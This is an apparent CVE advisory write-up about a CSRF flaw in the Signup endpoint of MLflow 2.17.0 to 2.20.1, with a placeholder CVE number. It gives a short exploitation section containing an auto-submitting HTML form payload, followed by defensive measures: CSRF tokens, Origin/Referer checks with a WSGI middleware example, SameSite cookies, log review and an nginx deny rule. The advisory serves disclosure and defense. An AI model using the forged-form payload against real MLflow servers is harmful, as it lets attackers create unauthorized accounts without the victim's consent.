MLflow, Cross-Site Request Forgery (CSRF), CVE-2025-XXXX (Moderate)

A Cross-Site Request Forgery (CSRF) vulnerability in MLflow versions 2.17.0 to 2.20.1 allows attackers to exploit the Signup feature to create unauthorized accounts. This occurs due to insufficient validation of HTTP requests, enabling malicious actors to forge requests and execute actions on behalf of unsuspecting users. When a victim is tricked into visiting a malicious website, the site can send a forged request to the MLflow server, creating a new account without the victim’s consent. This account can then be used to perform unauthorized operations, potentially compromising the integrity of the MLflow instance.

DailyCVE Form:

Platform: MLflow
Version: 2.17.0 – 2.20.1
Vulnerability: CSRF in Signup
Severity: Moderate
Date: Mar 20, 2025

What Undercode Say:

Exploitation:

1. Crafting Malicious Payload:

Create a malicious HTML form that automatically submits a POST request to the MLflow Signup endpoint.


<form action="http://<mlflow-server>/signup" method="POST">
<input type="hidden" name="username" value="attacker" />
<input type="hidden" name="password" value="password123" />
</form>

<script>document.forms[0].submit();</script>

2. Triggering CSRF:

Trick a victim into visiting the malicious page. The form will automatically submit, creating an account controlled by the attacker.

3. Exploiting Unauthorized Access:

Use the newly created account to perform actions such as modifying MLflow experiments, deleting models, or accessing sensitive data.

Protection:

1. Implement CSRF Tokens:

Add CSRF tokens to all state-changing requests.

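from flask import Flask
from flask_wtf.csrf import CSRFProtect
app = Flask(__name__)  # app.config['SECRET_KEY'] must be set for token signing
csrf = CSRFProtect(app)  # rejects POST/PUT/PATCH/DELETE without a valid token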

2. Validate Origin Headers:

Ensure requests originate from trusted domains by validating the `Origin` or `Referer` headers.

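from flask import request, abort
# Runs inside a request handler; ALLOWED_ORIGINS is the set of trusted origins.
if request.headers.get('Origin') not in ALLOWED_ORIGINS:
    abort(403)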

3. Update MLflow:

Upgrade to MLflow version 2.20.2 or later, which includes patches for this vulnerability.

4. Use SameSite Cookies:

Configure cookies with the `SameSite` attribute so the browser does not attach them to cross-site requests.

app.config['SESSION_COOKIE_SAMESITE'] = 'Strict'

5. Monitor Logs:

Regularly review server logs for suspicious account creation activities.

grep "POST /signup" /var/log/mlflow/access.log

6. Educate Users:

Train users to recognize phishing attempts and avoid clicking on untrusted links.

7. Deploy Web Application Firewall (WAF):

Use a WAF to block malicious requests targeting the Signup endpoint.

# nginx: reject every request to the Signup endpoint
location /signup {
    deny all;
}

By following these steps, organizations can mitigate the risk of CSRF attacks and secure their MLflow instances.
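
Step 2 above checks only `Origin`. The following added example (not MLflow's code and not part of the original advisory) applies the same check with the `Referer` fallback the text mentions, written as a WSGI wrapper using only the standard library. The host in `ALLOWED_ORIGINS` and the names `source_is_trusted` and `OriginCheckMiddleware` are assumptions.

```python
from urllib.parse import urlsplit

# Assumption: the single origin the MLflow UI is served from (placeholder host).
ALLOWED_ORIGINS = {"https://mlflow.example.internal"}
SAFE_METHODS = {"GET", "HEAD", "OPTIONS"}

def _origin_of(url):
    """Reduce a URL to scheme://host[:port], lower-cased; None if unusable."""
    parts = urlsplit(url or "")
    if parts.scheme not in ("http", "https") or not parts.netloc:
        return None
    return f"{parts.scheme}://{parts.netloc}".lower()

def source_is_trusted(method, origin, referer, allowed=ALLOWED_ORIGINS):
    """Decide whether a request may change state, based on where it came from."""
    if method.upper() in SAFE_METHODS:
        return True
    # Prefer Origin; fall back to Referer only when Origin is absent.
    # "null" or an unparsable value is never trusted, and neither is a
    # request carrying no source header at all (fail closed).
    claimed = _origin_of(origin) if origin is not None else _origin_of(referer)
    # Exact match on the normalized origin, so look-alike hosts and
    # userinfo tricks (trusted-host@other-host) do not pass.
    return claimed is not None and claimed in allowed

class OriginCheckMiddleware:
    """WSGI wrapper that answers 403 before the wrapped app sees the request."""
    def __init__(self, app, allowed=ALLOWED_ORIGINS):
        self.app, self.allowed = app, allowed

    def __call__(self, environ, start_response):
        ok = source_is_trusted(environ.get("REQUEST_METHOD", "GET"),
                               environ.get("HTTP_ORIGIN"),
                               environ.get("HTTP_REFERER"), self.allowed)
        if not ok:
            body = b"cross-site request rejected\n"
            start_response("403 Forbidden", [("Content-Type", "text/plain"),
                                             ("Content-Length", str(len(body)))])
            return [body]
        return self.app(environ, start_response)
```

Because the check fails closed, non-browser clients that send neither header are rejected on state-changing methods, so scope it to browser-facing routes or exempt authenticated API traffic deliberately.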

References:

Reported By: https://github.com/advisories/GHSA-969w-gqqr-g6j3